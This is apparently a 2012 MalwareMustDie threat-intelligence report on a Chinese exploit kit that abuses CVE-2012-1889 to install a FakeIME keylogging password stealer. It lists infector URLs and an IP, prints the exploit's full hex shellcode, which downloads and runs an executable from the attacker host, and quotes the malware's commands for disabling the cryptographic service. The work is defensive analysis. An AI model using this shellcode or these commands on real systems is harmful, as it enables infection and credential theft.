* * Chinese ExploitKit/CVE-2012-1889| FakeIME InfoStealer Trojan * *
================================
CHINESE FAKE IME INFECTIONS
STARTING FAKE NET SERVICE
STARTING CRYPTER SERVICE
INFO STEALER
Found/analysis:
#MalwareMustDie / @unixfreaxjp
================================
-----------
Infector IP:
-----------
IP: 222.73.57.117
inetnum:        222.64.0.0 - 222.73.255.255
netname:        CHINANET-SH
descr:          CHINANET shanghai province network
descr:          China Telecom
descr:          No1,jin-rong Street
descr:          Beijing 100032
country:        CN
-----------
Info:
-----------
person:         Wu Xiao Li
address:        Room 805,61 North Si Chuan Road,Shanghai,200085,PRC
country:        CN
phone:          +86-21-63630562
fax-no:         +86-21-63630566
e-mail:         ip-admin@mail.online.sh.cn
nic-hdl:        XI5-AP
mnt-by:         MAINT-CHINANET-SH
changed:        ip-admin@mail.online.sh.cn 20010510
source:         APNIC
-----------
Infector urls:
-----------
h00p://9be14ngfsd.pppdiy.com/jx/xop.html
h00p://9f515lzff3.pppdiy.com/xy/xop.html 
h00p://9kpgfwqdrj.pppdiy.com/hx/xop.html 
h00p://9mf9x3cl55.pppdiy.com/tl/xop.html 
h00p://9spxqc71fa.pppdiy.com/jy/xop.html 
h00p://s35fc3qiyl.pppdiy.com/wd/xop.html 
h00p://s3ebb5z4sk.pppdiy.com/wd/xop.html 
h00p://s52csz5u47.pppdiy.com/wd/xop.html 
h00p://s5c2ouavle.pppdiy.com/ny/xop.html 
h00p://s9inw8nkk9.pppdiy.com/yl/xop.html 
h00p://74jjdqugds.pppdiy.com/zt/xop.html 
h00p://75kay4lxj8.pppdiy.com/jy/xop.html 
h00p://67ldbpbmmj.pppdiy.com/jy/xop.html 
h00p://rq2e9k4ti8.pppdiy.com/xy/xop.html 
h00p://rre11swub9.pppdiy.com/yh/xop.html 
h00p://436p1bwt5s.pppdiy.com/wd/xop.html 
h00p://4a41nvbsst.pppdiy.com/tl/xop.html 
h00p://4bo1ocjpk9.pppdiy.com/wm/xop.html 
h00p://4eb2c9aupa.pppdiy.com/hx/xop.html 
h00p://4ekyz6afnh.pppdiy.com/jy/xop.html 
h00p://4gjoqgnvym.pppdiy.com/jy/xop.html 
h00p://4j4yxxyugh.pppdiy.com/wd/xop.html 
h00p://4s2aqluitq.pppdiy.com/yl/xop.html 
h00p://52jbsoqe53.pppdiy.com/ah/xop.html 
h00p://rkiit9hy1a.pppdiy.com/zt/xop.html 
h00p://rldq7secto.pppdiy.com/jy/xop.html 
h00p://roapzl6ao6.pppdiy.com/yl/xop.html 
h00p://rohws731yt.pppdiy.com/tl/xop.html 
h00p://3q4cnllxe2.pppdiy.com/yl/xop.html 
h00p://2e1t8v8z9v.pppdiy.com/zt/xop.html 
h00p://2kqi7tk2tx.pppdiy.com/wd/xop.html 
h00p://2nzysx8qfy.pppdiy.com/xy/xop.html 
h00p://2pg54c2ay2.pppdiy.com/ty/xop.html 
h00p://2tvypppa1t.pppdiy.com/jx/xop.html 
h00p://2zaco8gjga.pppdiy.com/xy/xop.html 
h00p://31fclefhp5.pppdiy.com/jy/xop.html 
h00p://37fs5qo4q5.pppdiy.com/jy/xop.html 
h00p://3p3sivfs1w.pppdiy.com/jy/xop.html 
h00p://rceta3uznz.pppdiy.com/xy/xop.html 
h00p://11a1tgjoav.pppdiy.com/wd/xop.html 
h00p://quyi6g8jz8.pppdiy.com/zt/xop.html 
h00p://r7ykgk31xl.pppdiy.com/ny/xop.html 
h00p://r89i2jzv72.pppdiy.com/ah/xop.html 
h00p://r8cvnadv11.pppdiy.com/jx/xop.html 
h00p://r8v7by8hl7.pppdiy.com/wm/xop.html 
h00p://r9mdp167ou.pppdiy.com/xy/xop.html 
h00p://ra5dfl2dhp.pppdiy.com/tl/xop.html 
h00p://q4u427a9d9.pppdiy.com/wl/xop.html 
h00p://qbfjz6vs2b.pppdiy.com/ty/xop.html 
h00p://qfckl9xclm.pppdiy.com/xy/xop.html 
h00p://qoxvbbwxxv.pppdiy.com/jy/xop.html 
h00p://qpm2jb8vds.pppdiy.com/xy/xop.html 
h00p://qrbvhfpnfi.pppdiy.com/my/xop.html 
h00p://qtxjsy4psn.pppdiy.com/wd/xop.html 
h00p://ppmcnqlq4b.pppdiy.com/hx/xop.html 
h00p://pnj1c3glru.pppdiy.com/wd/xop.html 
h00p://pnrks68rrs.pppdiy.com/wd/xop.html 
h00p://pn87z1eiaj.pppdiy.com/yl/xop.html 
h00p://pcsssued3v.pppdiy.com/tl/xop.html 
h00p://p2rb4o7xo3.pppdiy.com/ty/xop.html 
h00p://p444fcmod8.pppdiy.com/jy/xop.html 
h00p://oy3eewl8dj.pppdiy.com/wm/xop.html 
h00p://z1v1awk14w.pppdiy.com/zx/xop.html 
h00p://zlpr6v2wdp.pppdiy.com/wd/xop.html 
h00p://zrxodxxsdb.pppdiy.com/jy/xop.html 
h00p://x82ndlgusg.pppdiy.com/xy/xop.html 
h00p://xgbex2gqur.pppdiy.com/wd/xop.html 
h00p://xinfejn8sh.pppdiy.com/yh/xop.html 
h00p://ypqdgh1spm.pppdiy.com/zx/xop.html 
h00p://yzua8al89b.pppdiy.com/wd/index.ht 
h00p://u3gltdtoo4.pppdiy.com/jy/xop.html 
h00p://vev8ncrkcm.pppdiy.com/jx/xop.html 
h00p://vlbujx6d19.pppdiy.com/xy/xop.html 
h00p://vouludav9m.pppdiy.com/wd/xop.html 
h00p://vqouin8qdg.pppdiy.com/wd/xop.html 
h00p://wjjxh168lj.pppdiy.com/wd/index.ht 
h00p://ssx2pc47nw.pppdiy.com/ty/xop.html 
h00p://sw29diefib.pppdiy.com/wd/xop.html 
h00p://t1zsxal6p5.pppdiy.com/ty/xop.html 
h00p://pq58ow6ydk.pppdiy.com/yl/xop.html 
h00p://rlcensq6ds.pppdiy.com/wd/xop.html 
h00p://s9ms36eb5q.pppdiy.com/ah/xop.html 
h00p://p8t89f1q3x.pppdiy.com/xy/xop.html 
h00p://pcsir3ijj9.pppdiy.com/zt/xop.html 
h00p://pjv68ibarl.pppdiy.com/ah/xop.html 
h00p://ow858ymp4d.pppdiy.com/xx/xop.html 
h00p://opu3mx9u8s.pppdiy.com/tl/xop.html 
h00p://o1v1ia7fzp.pppdiy.com/ah/xop.html 
h00p://nq9k8bhtgy.pppdiy.com/tl/xop.html 
h00p://mj3aqytgna.pppdiy.com/wd/xop.html 
h00p://mkjbyf6vr8.pppdiy.com/xy/xop.html 
h00p://lsjq1ic827.pppdiy.com/zt/xop.html 
h00p://ln9jwxhwp2.pppdiy.com/jy/xop.html 
h00p://kltudl7ixd.pppdiy.com/wd/xop.html 
h00p://kb8ngrsrkt.pppdiy.com/zx/xop.html 
h00p://ki9hfgy8eb.pppdiy.com/wd/index.ht 
h00p://jqqm6ksd4u.pppdiy.com/jx/xop.html 
h00p://joez462a36.pppdiy.com/xy/xop.html 
h00p://ir1mxyqbe1.pppdiy.com/jy/xop.html 
h00p://hrwvzspefk.pppdiy.com/my/xop.html 
h00p://hwwlnwoh5u.pppdiy.com/jx/xop.html 
h00p://hehqxbhtrr.pppdiy.com/xy/xop.html 
h00p://gzfuswbru9.pppdiy.com/xy/xop.html 
h00p://gur1nihj4g.pppdiy.com/wd/xop.html 
h00p://gcrbfl8iyi.pppdiy.com/jx/xop.html 
h00p://fs12vmyw85.pppdiy.com/wd/xop.html 
h00p://fs9kdc75dk.pppdiy.com/jy/xop.html 
h00p://dxonfcd1zh.pppdiy.com/zt/xop.html 
h00p://dfmta9juu5.pppdiy.com/ah/xop.html 
h00p://di6uj6rqk3.pppdiy.com/jy/xop.html 
h00p://85qcnilv1k.pppdiy.com/my/xop.html 
h00p://9fnq4ekiqd.pppdiy.com/wd/index.ht 
h00p://4oy56fcvmg.pppdiy.com/jy/xop.html 
h00p://x7zzmg5b1v.pppdiy.com/jx/xop.html 
h00p://zgxx2raoak.pppdiy.com/jx/xop.html 
h00p://wxf3mzd3zn.pppdiy.com/jx/xop.html 
h00p://wzrkh2m8xl.pppdiy.com/xx/xop.html 
h00p://uc18awkxod.pppdiy.com/my/xop.html 
h00p://v2229jswhx.pppdiy.com/wd/xop.html 
h00p://pxkxilbpos.pppdiy.com/wm/xop.html 
h00p://rakwmwhpve.pppdiy.com/xy/xop.html 
h00p://nsqjxjbfcs.pppdiy.com/ah/xop.html 
h00p://ny5iceirim.pppdiy.com/jx/xop.html 
h00p://iz5lh4r5qi.pppdiy.com/yl/xop.html 
h00p://agz5utxh9u.pppdiy.com/wd/index.ht 
h00p://4fp9g7s3tr.pppdiy.com/xy/xop.html 
h00p://57vcqwfb8a.pppdiy.com/jy/xop.html 
h00p://oqlpdxtgux.pppdiy.com/zt/xop.html 
h00p://ocd1bm7coa.pppdiy.com/xy/xop.html 
h00p://od5aaz7m5e.pppdiy.com/jx/xop.html 
h00p://odvn3j955e.pppdiy.com/zx/xop.html 
h00p://ogd48fw2lt.pppdiy.com/tl/xop.html 
h00p://oixgmmsng1.pppdiy.com/xy/xop.html 
h00p://ntuhp4ou1t.pppdiy.com/yl/xop.html 
h00p://oaicu6zotz.pppdiy.com/zt/xop.html 
h00p://oannucq891.pppdiy.com/jx/xop.html 
h00p://nmwlyg9jtd.pppdiy.com/xy/xop.html 
h00p://nkkprh379v.pppdiy.com/wd/index.ht 
h00p://nf8ri2a2ah.pppdiy.com/zt/xop.html 
h00p://myx7rlgfgz.pppdiy.com/yl/xop.html 
h00p://mzjqths79w.pppdiy.com/yl/xop.html 
h00p://n19yfqnfgx.pppdiy.com/jy/xop.html 
h00p://n318aq72eb.pppdiy.com/jy/xop.html 
h00p://n3zxb481z3.pppdiy.com/yh/xop.html 
h00p://n8dx15kr7y.pppdiy.com/xy/xop.html 
h00p://muy6w1ufrw.pppdiy.com/jx/xop.html 
h00p://mvhnrd8c9o.pppdiy.com/jy/xop.html 
h00p://mvzn8qs8lg.pppdiy.com/wd/xop.html 
h00p://mu5dptjoda.pppdiy.com/xy/xop.html 
h00p://msogw56yis.pppdiy.com/xy/xop.html 

======================
ANALYSIS
======================
--02:53:10--  h00p://9be14ngfsd.pppdiy.com/jx/xop.html
           => `xop.html'
Resolving 9be14ngfsd.pppdiy.com... 222.73.57.117
Connecting to 9be14ngfsd.pppdiy.com|222.73.57.117|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 9,950 (9.7K) [text/html]
02:53:15 (2.74 KB/s) - `xop.html' saved [9950/9950]

-----------------------------

[h00p] URL: h00p://9be14ngfsd.pppdiy.com/jx/xop.html (Status: 200, Referrer: None)
// ActiveX : f6d90f11-9c73-11d3-b32e-00c04f990bb4 Droped..
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="vwtI"></object>
<meta content="IE=7" h00p-equiv="X-UA-Compatible"/
------------shellcode executed------------------

58 58 58 58 eb 10 5b 4b  33 c9 66 b9 b8 03 80 34   // CVE-2012-1889 
0b bd e2 fa eb 05 e8 eb  ff ff ff 54 a3 be bd bd 
e2 d9 1c 8d bd bd bd 36  fd b1 36 cd a1 10 36 d5 
b5 36 4a d7 ac e4 55 03  bf bd bd 2d 5f 45 d5 8e 
8f bd bd d5 e8 ce d8 cf  e9 36 fb b1 55 03 bc bd 
bd 36 55 d7 b8 e4 55 23  bf bd bd 5f 44 d5 d2 d3 
bd bd d5 c8 cf d1 d0 e9  42 ab 38 7d c8 ae d5 d2 
d3 bd bd d5 c8 cf d1 d0  e9 36 fb b1 55 33 bc bd 
bd 36 55 d7 bc e4 55 d3  bf bd bd 5f 44 d5 d1 8e 
8f bd d5 ce d5 d8 d1 e9  36 fb b1 55 d2 bc bd bd 
36 55 d7 bc e4 55 f2 bf  bd bd 5f 44 3c 51 bd bc 
bd bd 36 61 3c 7e 3d bd  bd bd d7 bd d7 a7 ee d7 
bd 42 eb e1 8e 7d fd 3d  81 be bd c8 44 7a b9 be 
e1 fa 93 d8 7a f9 be b9  c5 d8 bd bd 8e 74 ec ec 
ee ea ec 8e 7d 36 fb e5  55 9f bc bd bd 3e 45 bd 
54 1e bd bd bd 2d d7 bd  d7 bd d7 be d7 bd d7 bf 
d5 bd bd bd 7d ee 36 fb  99 55 bc bc bd bd 34 fb 
dd d7 bd ed 42 eb 95 34  fb d9 36 fb dd d7 bd d7 
bd d7 bd d7 b9 d7 bd ed  42 eb 91 d7 bd d7 bd d7 
bd d5 a2 bd b2 bd ed 42  eb 81 34 fb c5 36 f3 d9 
3d c1 b5 42 09 c9 b1 3d  c1 b5 42 bd c9 b8 3d c9 
b5 42 09 5f 56 34 3b 3d  bd bd bd 7a fb cd bd bd 
bd bd 7a fb c9 bd bd bd  bd d7 bd d7 bd d7 bd 36 
fb dd ed 42 eb 85 36 3b  3d bd bd bd d7 bd 30 f3 
c9 ec 42 cb cd ed 42 cb  dd 42 eb 8d 42 cb dd 42 
eb 89 42 cb c5 42 eb fd  36 46 8e 7d 8e 66 3c 51 
bd bf bd bd 36 71 3e 45  e9 c0 b5 34 a1 bc 3e 7d 
b9 56 4e 36 71 36 64 3e  7e ad 8e 7d ed ec ee ed 
ed ed ed ed ed ea ed ed  42 eb b5 36 c3 e9 55 ad 
bc bd bd 55 d8 bd bd bd  d5 de cb ca bd d5 ce d5 
d9 d2 e9 36 fb b1 55 99  bd bd bd 34 fb 81 d9 1c 
b9 bd bd bd 30 1d dd 42  42 42 d7 d8 42 cb 81 36 
fb ad 55 b5 bd bd bd 8e  66 ee ee ee ee 42 6d 3d 
85 55 3d 85 54 c8 ac 3c  c5 b8 2d 2d 2d 2d c9 b5 
36 42 e8 36 51 30 fd b8  42 5d 55 1b bd bd bd 7e 
55 1d bd bd bd 05 ac bc  b9 3d 7f b1 bd 55 2e bd 
bd bd 3c 51 bd bc bd bd  36 41 3e 7a b9 7a ba 8f 
c9 2c b1 7a fa b9 de 34  6c f2 7a fa b5 1d d8 2a 
76 7a fa b1 ec fd 07 c2  7a fa ad 83 a0 0b 84 7a 
fa a9 05 d4 69 a6 7a fa  a5 03 c2 db 1d 7a fa a1 
41 14 8a 10 7a fa 9d 25  b7 ad 45 d9 1c 8d bd bd 
bd 36 fd b1 36 cd a1 10  36 d5 b5 36 4a d7 b9 e4 
55 e9 bd bd bd 2d 5f 45  d5 8e 8f bd bd d5 e8 ce 
d8 cf e9 36 bb 55 e8 42  42 42 36 55 d7 b8 e4 55 
88 bd bd bd 5f 44 8e 42  ea 42 eb b9 56 bf e5 7e 
55 44 42 42 42 e6 7b ba  05 34 e2 bc db 7a fa b8 
42 5d 7e ee 36 61 ee d7  fd d5 bd ad bd bd ea 36 
fb 9d 55 a5 42 42 42 e5  7e ec eb 36 c8 81 36 c9 
93 c5 be 48 eb 36 cb 9d  be 48 8e 74 f4 fc 10 be 
78 8e 66 b2 03 ad 87 6b  c9 b5 7c 76 ba be 67 fd 
56 4c 86 a2 c8 5a e3 36  e3 99 be 60 db 36 b1 f6 
36 e3 a1 be 60 36 b9 36  be 78 16 e3 e4 7e 55 60 
41 42 42 0f 4f 5f 49 84  5f c0 3e 67 f5 c6 80 8f 
c9 2c b1 38 62 12 06 de  34 6c f2 ec fd 07 c2 1d 
d8 2a 76 a3 19 d9 52 2e  8f 59 29 33 ae b7 11 7f 
a4 f6 bc 79 30 a2 c9 ea  db b0 42 fe 03 11 66 c0 
4d 18 27 ef 43 1a 67 83  a0 0b 84 05 d4 69 a6 03 
c2 db 1d 41 14 8a 10 25  b7 ad 45 3d 6b 12 27 46 
ee a8 db d5 c9 c9 cd 87  92 92 8f 8f 8f 93 8a 8e 
93 88 8a 93 8c 8c 8a 92  d8 c5 d8 92 d7 c5 93 d8 
c5 d8 bd bd bd bd bd bd  bd bd bd bd bd bd bd bd 
bd bd bd bd bd bd ea ea 

↑XOR and found h00p://222.73.57.117/exe/jx.exe // path found;


-------------------------------
--03:01:26--  h00p://222.73.57.117/exe/jx.exe <===== TROJAN FAKE IME KEYLOGGING....
           => `jx.exe'
Connecting to 222.73.57.117:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 48,128 (47K) [application/octet-stream]
------------------------------------

Sections:
   UPX0 0x1000 0x7000 0    <<<<<<< PACKED!!
   UPX1 0x8000 0xc000 46592   <<<<<<< PACKED!!
   UPX2 0x14000 0x1000 512    <<<<<<< PACKED!!


//unpacking.....
UPX 3.07        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 08th 2010
   File size         Ratio      Format      Name
------------------   ------   -----------   -----------
58880 <-     48128   81.74%    win32/pe     sample
Unpacked 1 file.

-------bin analysis------

Fail CRC: Claimed:  0  Actual:  60344
Fail Compile Time: 2033-11-12 07:06:07
Compiler: Microsoft Visual C++ v6.0

//strange,,,,
0x40402c CreateToolhelp32Snapshot
0x404054 Process32First
0x404080 Process32Next

// Renaming itself....
call    sub_40161C
call    sub_401693
mov     ebx, offset aJx3client_exe ; "JX3Client.exe"


--------------traces---------

// Malware OP traces...

000000002FE6   0000004047E6      0   MoveFileA
000000003032   000000404832      0   WriteFile
00000000303E   00000040483E      0   CreateFileA
00000000304C   00000040484C      0   WinExec
000000003074   000000404874      0   CopyFileA

// keystroke controlling...

0000000030C0   0000004048C0      0   GetKeyboardLayoutList
0000000030D8   0000004048D8      0   GetKeyboardLayoutNameA
0000000030F2   0000004048F2      0   ActivateKeyboardLayout
00000000310C   00000040490C      0   GetKeyboardLayout
000000003120   000000404920      0   LoadKeyboardLayoutA
000000003136   000000404936      0   UnloadKeyboardLayout

// IME Traces...

IMM32.dll.ImmGetDescriptionA Hint[0]
IMM32.dll.ImmInstallIMEA Hint[0]
IMM32.dll.ImmIsIME Hint[0]

// temp OPS data

00000000380C   00000040520C      0   %c:\Recycled\%d.tmp
000000003820   000000405220      0   %c:\RECYCLER\%d.tmp

// Crypter service..
00000000E05C   00000040FA5C      0   sc delete cryptsvc
00000000E070   00000040FA70      0   sc config cryptsvc start= disabled
00000000E094   00000040FA94      0   net stop cryptsvc

//registry added traces

00000000E0A8   00000040FAA8      0   %s%s%d.dll // kbdus.dll
00000000E0DC   00000040FADC      0   SOFTWARE\kingsoft\JX3\zhcn
00000000E0F8   00000040FAF8      0   JX3Client  // JX3Client.exe
00000000E104   00000040FB04      0   Software\Microsoft\Windows\ShellNoRoam\MUICache
00000000E134   00000040FB34      0   %sdllcache\%s
00000000E144   00000040FB44      0   %syu%s     // 


//Drops
C:\WINDOWS\system32\chinasougou.ime
C:\WINDOWS\system32\yumidimap.dll
C:\WINDOWS\system32\net1.exe 


//Malwareservice...
Filename: 	net1.exe 
MD5: 	3f14c041342e3fba343f2a1d11e74bba 
SHA-1: 	4221467faee4926d692bd5ae71cf0a37f326bf42 
File Size: 	124928 Bytes
Command Line: 	net1 stop cryptsvc 

//Crypter Service:
Filename: 	sc.exe 
MD5: 	a48b1c06219a01a60cd8d4d45440bde9 
SHA-1: 	34af23607ad5afa9e61b6a96cec811e6bdc50b4a 
File Size: 	31232 Bytes
Command Line: 	sc config cryptsvc start= disabled 

------------------------------------------------------
VIRUS TOTAL CHECKS
-----------------------------------------------------
First Check in VT: (PACKED/ORIGINAL)
https://www.virustotal.com/file/62f1707394325b5c3ac09df8e362b9a0710fbc956b3327f419063e24182c1e5b/analysis/1348946206/
McAfee                   : Artemis!BBFC347F66C1
K7AntiVirus              : Riskware
TheHacker                : Posible_Worm32
F-Prot                   : W32/Heuristic-114!Eldorado
ESET-NOD32               : a variant of Win32/PSW.OnLineGames.QBF
TrendMicro-HouseCall     : TROJ_GEN.RCBCEHF
Kaspersky                : HEUR:Trojan.Win32.Generic
F-Secure                 : Dropped:Trojan.PWS.FakeIME.B
VIPRE                    : Trojan.Win32.Generic!BT
AntiVir                  : TR/ATRAPS.Gen
TrendMicro               : TROJ_GEN.RCBCEHF
McAfee-GW-Edition        : Artemis!BBFC347F66C1
Jiangmin                 : Trojan/Generic.algbo
Microsoft                : PWS:Win32/Lolyda.BF
Commtouch                : W32/Heuristic-114!Eldorado
AhnLab-V3                : Trojan/Win32.Xema
VBA32                    : TrojanPSW.QQTen.ng
PCTools                  : Trojan.Gen
Ikarus                   : Trojan-PWS.Win32.Lolyda
Fortinet                 : W32/Onlinegames.QBF!tr
AVG                      : unknown virus Win32/DH{HhM6SEVn}
Panda                    : Suspicious file
---------------------------------------------------------------------
First Check in VT: (UNPACKED)
https://www.virustotal.com/file/f63345d3adc06ca20aafe0e9ab4b0a2c47f4dcff71b0d696dd8ae8412626fe4c/analysis/1348946229/

F-Secure                 : Dropped:Trojan.PWS.FakeIME.B
DrWeb                    : BackDoor.PcClient.5930
GData                    : Dropped:Trojan.PWS.FakeIME.B
Symantec                 : Suspicious.Cloud.5
Norman                   : W32/OnLineGames.NVOE
ESET-NOD32               : a variant of Win32/PSW.OnLineGames.QBF
eScan                    : Dropped:Trojan.PWS.FakeIME.B
Fortinet                 : W32/Onlinegames.QBF!tr
Emsisoft                 : Trojan-PWS.Win32.Lolyda!IK
VBA32                    : TrojanPSW.QQTen.ng
Kaspersky                : HEUR:Trojan.Win32.Generic
Jiangmin                 : Trojan/Generic.algbo
Rising                   : Trojan.Win32.Fednu.uhc
Ikarus                   : Trojan-PWS.Win32.Lolyda
AntiVir                  : TR/Crypt.ZPACK.Gen
AVG                      : unknown virus Win32/DH{HhM6SEVn}
Panda                    : Suspicious file
ViRobot                  : Trojan.Win32.A.PSW-Frethoq.51200
Comodo                   : TrojWare.Win32.Poison.QBF

INFECTOR: XOP.HTML
https://www.virustotal.com/file/c9b661491464aecd75cee4bc205d3076829b1b4c9915e2999d15d2a89536f421/analysis/1348946760/

eScan                    : Exploit.CVE-2012-1889.Gen
nProtect                 : Exploit.CVE-2012-1889.Gen
CAT-QuickHeal            : Exploit.CVE.2012.1889
McAfee                   : Exploit-CVE2012-1889
K7AntiVirus              : Exploit
F-Prot                   : JS/CVE-1889
Norman                   : ShellCode.AA
TotalDefense             : JS/Tnega.VKD
Avast                    : JS:CVE-2012-1889 [Expl]
eSafe                    : JS.ShellCode.Aurora
ClamAV                   : Exploit.CVE_2012_1889-6
Kaspersky                : HEUR:Exploit.Script.Generic
BitDefender              : Exploit.CVE-2012-1889.Gen
Sophos                   : Mal/JSShell-B
Comodo                   : TestSignature.JS.Agent.SH
F-Secure                 : Exploit:JS/CVE-2012-1889.A
DrWeb                    : Exploit.CVE2012-1889
VIPRE                    : Exploit.HTML.CVE-2012-1889 (v)
AntiVir                  : Exp/JS.Shellcode.H
McAfee-GW-Edition        : Heuristic.BehavesLike.JS.Unwanted
Emsisoft                 : Trojan.Script!IK
ESET-NOD32               : JS/Exploit.Shellcode.A.gen
Microsoft                : Exploit:JS/ShellCode.AT
GData                    : Exploit.CVE-2012-1889.Gen
Commtouch                : JS/CVE-1889
AhnLab-V3                : JS/Agent
Ikarus                   : Trojan.Script
AVG                      : Exploit


====================================
MALWARE MUST DIE!!!
#MalwareMustDie
Sept 29 2012 / @unixfreaxjp
===================================